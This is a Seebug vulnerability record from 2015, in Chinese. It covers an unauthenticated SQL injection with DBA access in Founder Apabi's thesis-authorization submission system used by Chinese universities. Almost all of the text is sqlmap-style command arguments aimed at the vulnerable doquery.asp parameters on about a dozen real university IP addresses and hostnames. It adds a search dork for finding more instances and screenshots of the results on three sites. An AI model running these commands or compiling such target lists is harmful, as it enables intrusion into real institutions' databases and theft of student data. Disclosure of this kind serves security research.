某高校在用系统sql注入(打包)(DBA)(无需登录)2

2015-03-16T00:00:00
ID SSV:95496
Type seebug
Reporter Root
Modified 2015-03-16T00:00:00

Description

简要描述:

1

详细说明:

案例较多,给CNCERT

漏洞证明:

Apabi论文授权提交系统 版权所有© 北京方正阿帕比技术有限公司 谷歌搜索:论文授权提交系统 北京大学复旦大学什么的都在其中~

<img src="https://images.seebug.org/upload/201503/1319542601266952db5b97edd2cbc24a55f85c52.png" alt="060814241c327099951e4c60760c02105295ae87.png" width="600" onerror="javascript:errimg(this);">

漏洞文件doquery.asp
漏洞参数:txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate 随便来几个案例 210.44.126.14/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"

202.195.243.37/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"

202.120.121.200/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
pss.uestc.edu.cn/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
202.203.222.222/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
218.242.146.229/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
202.193.70.164/TASi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
202.120.227.60/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
59.72.151.17:8000/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
202.197.127.125/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
218.199.187.117:8080/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
202.119.83.2/apatasi30/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
218.242.146.229/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate"
前三个跑的结果

<img src="https://images.seebug.org/upload/201503/131957209d6bcc4612879ef6620b74734c1965bb.png" alt="屏幕截图(984)1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/131957309b97d02b1e88dd59d2cd267eaa263236.png" alt="屏幕截图(985).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/1319573789547f1a22f7b50914923ac8e3cb3c2e.png" alt="屏幕截图(986).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/13195744f36f2eefd1c53c62c97f8ac7e8a29c0f.png" alt="屏幕截图(987).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/13195752f15cefbfd6abf0a84eaa4225d747d2e8.png" alt="屏幕截图(988).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/13195759429afc454a4007c1f5283071cd198265.png" alt="屏幕截图(989).png" width="600" onerror="javascript:errimg(this);">